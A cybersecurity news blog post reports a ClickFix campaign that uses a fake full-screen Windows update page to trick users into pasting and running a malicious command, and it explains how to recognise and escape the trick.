Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label browser fullscreen scam. Show all posts
Windows update scam
browser fullscreen scam ClickFix Cybersecurity Warning fake Windows update attack malware Windows update scam

Hackers Use Fake Windows Update Screen to Trick Users Into Running Malware Commands

 

A new cyberattack is circulating online, disguising itself as a legitimate Windows update in an effort to deceive users into executing harmful commands that can lead to malware installation.

Daniel B., a cybersecurity researcher with the UK’s National Health Service, discovered the scheme while examining malicious activity online. According to his findings, the operation has been active for about a month on the domain groupewadesecurity[.]com. When users visit the site, their computer—or even their smartphone—may suddenly display what looks like a genuine Windows update blue screen. This screen urges them to complete several keyboard steps.

In reality, the update screen is entirely fraudulent. It’s delivered through the browser and relies on the Fullscreen API to cover the entire display, creating the illusion of a system-level update. The interface then instructs users to press the Windows key along with the R key, which opens the Run dialog box on Windows systems. Meanwhile, the website silently places malicious commands onto the user’s clipboard.

The next prompt tells the user to hit “CTRL + V” to paste—and then press Enter. Anyone who follows these steps unknowingly triggers a command instructing Windows to execute code hosted on the attacker-controlled domain.

This attack is a fresh spin on the ongoing “ClickFix” technique, which has been used for roughly a year to manipulate users into running commands that install malware. Previous ClickFix campaigns have appeared as fake CAPTCHA pages, counterfeit Chrome error messages, and bogus government portals. The method continues to evolve in pursuit of new ways to lure victims. As Daniel B. noted, “The more recent ClickFix campaigns like these fake Windows update pages are a powerful reminder that user vigilance and cybersecurity awareness training are just as critical as technical defenses.”

Thankfully, the attack is relatively simple to detect and avoid. No legitimate website or service will ever ask users to perform such system-level commands. Since the fake screen is just a browser tab in full-screen mode, closing the tab or window immediately stops the attack. Chrome also helps by prompting users to press “ESC” whenever the browser enters full-screen mode unexpectedly.

Despite this, cybersecurity firms say ClickFix-related campaigns are rising sharply. Because the user is the one unknowingly triggering the malicious code, traditional antivirus tools often fail to catch the threat. As ESET warned in June, "The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors."
Read more »
Subscribe to: Comments (Atom)